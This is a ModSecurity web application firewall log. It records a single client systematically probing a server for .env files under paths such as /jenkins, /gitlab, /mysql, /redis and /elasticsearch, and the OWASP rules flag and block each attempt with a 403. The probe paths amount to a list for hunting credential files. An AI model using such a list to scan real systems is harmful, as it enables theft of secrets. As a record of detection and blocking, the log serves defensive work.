[Mon May 11 18:03:40.016834 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cd/.env"] [unique_id "agH93EWKUxpmnkK7zHyiagAAAQ4"]
[Mon May 11 18:03:40.017057 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cd/.env"] [unique_id "agH93EWKUxpmnkK7zHyiagAAAQ4"]
[Mon May 11 18:03:40.017390 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93EWKUxpmnkK7zHyiagAAAQ4"]
[Mon May 11 18:03:40.229239 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/jenkins/.env"] [unique_id "agH93EWKUxpmnkK7zHyiawAAAQ4"]
[Mon May 11 18:03:40.229468 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/jenkins/.env"] [unique_id "agH93EWKUxpmnkK7zHyiawAAAQ4"]
[Mon May 11 18:03:40.229776 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93EWKUxpmnkK7zHyiawAAAQ4"]
[Mon May 11 18:03:40.410349 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/gitlab/.env"] [unique_id "agH93EWKUxpmnkK7zHyibAAAAQ4"]
[Mon May 11 18:03:40.410579 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/gitlab/.env"] [unique_id "agH93EWKUxpmnkK7zHyibAAAAQ4"]
[Mon May 11 18:03:40.410909 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93EWKUxpmnkK7zHyibAAAAQ4"]
[Mon May 11 18:03:40.590342 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/github/.env"] [unique_id "agH93EWKUxpmnkK7zHyibgAAAQ4"]
[Mon May 11 18:03:40.590560 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/github/.env"] [unique_id "agH93EWKUxpmnkK7zHyibgAAAQ4"]
[Mon May 11 18:03:40.590838 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93EWKUxpmnkK7zHyibgAAAQ4"]
[Mon May 11 18:03:40.899040 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/actions/.env"] [unique_id "agH93EWKUxpmnkK7zHyibwAAAQ4"]
[Mon May 11 18:03:40.899325 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/actions/.env"] [unique_id "agH93EWKUxpmnkK7zHyibwAAAQ4"]
[Mon May 11 18:03:40.899616 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93EWKUxpmnkK7zHyibwAAAQ4"]
[Mon May 11 18:03:41.073644 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/circleci/.env"] [unique_id "agH93UWKUxpmnkK7zHyicAAAAQ4"]
[Mon May 11 18:03:41.074004 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/circleci/.env"] [unique_id "agH93UWKUxpmnkK7zHyicAAAAQ4"]
[Mon May 11 18:03:41.074477 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93UWKUxpmnkK7zHyicAAAAQ4"]
[Mon May 11 18:03:41.241486 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/travis/.env"] [unique_id "agH93UWKUxpmnkK7zHyicgAAAQ4"]
[Mon May 11 18:03:41.241840 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/travis/.env"] [unique_id "agH93UWKUxpmnkK7zHyicgAAAQ4"]
[Mon May 11 18:03:41.242412 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93UWKUxpmnkK7zHyicgAAAQ4"]
[Mon May 11 18:03:41.405476 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/buildkite/.env"] [unique_id "agH93UWKUxpmnkK7zHyicwAAAQ4"]
[Mon May 11 18:03:41.405742 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/buildkite/.env"] [unique_id "agH93UWKUxpmnkK7zHyicwAAAQ4"]
[Mon May 11 18:03:41.406119 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93UWKUxpmnkK7zHyicwAAAQ4"]
[Mon May 11 18:03:41.583390 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mysql/.env"] [unique_id "agH93UWKUxpmnkK7zHyidAAAAQ4"]
[Mon May 11 18:03:41.583611 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mysql/.env"] [unique_id "agH93UWKUxpmnkK7zHyidAAAAQ4"]
[Mon May 11 18:03:41.583919 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93UWKUxpmnkK7zHyidAAAAQ4"]
[Mon May 11 18:03:41.745511 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/postgres/.env"] [unique_id "agH93UWKUxpmnkK7zHyidQAAAQ4"]
[Mon May 11 18:03:41.745784 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/postgres/.env"] [unique_id "agH93UWKUxpmnkK7zHyidQAAAQ4"]
[Mon May 11 18:03:41.746152 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93UWKUxpmnkK7zHyidQAAAQ4"]
[Mon May 11 18:03:41.960345 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mongodb/.env"] [unique_id "agH93UWKUxpmnkK7zHyidwAAAQ4"]
[Mon May 11 18:03:41.960579 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mongodb/.env"] [unique_id "agH93UWKUxpmnkK7zHyidwAAAQ4"]
[Mon May 11 18:03:41.960917 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93UWKUxpmnkK7zHyidwAAAQ4"]
[Mon May 11 18:03:42.143365 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/redis/.env"] [unique_id "agH93kWKUxpmnkK7zHyieAAAAQ4"]
[Mon May 11 18:03:42.143612 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/redis/.env"] [unique_id "agH93kWKUxpmnkK7zHyieAAAAQ4"]
[Mon May 11 18:03:42.143939 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93kWKUxpmnkK7zHyieAAAAQ4"]
[Mon May 11 18:03:42.314066 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/elasticsearch/.env"] [unique_id "agH93kWKUxpmnkK7zHyieQAAAQ4"]
[Mon May 11 18:03:42.314352 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/elasticsearch/.env"] [unique_id "agH93kWKUxpmnkK7zHyieQAAAQ4"]
[Mon May 11 18:03:42.314672 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH93kWKUxpmnkK7zHyieQAAAQ4"]
[Mon May 11 18:03:42.475913 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/rabbitmq/.env"] [unique_id "agH93kWKUxpmnkK7zHyiewAAAQ4"]
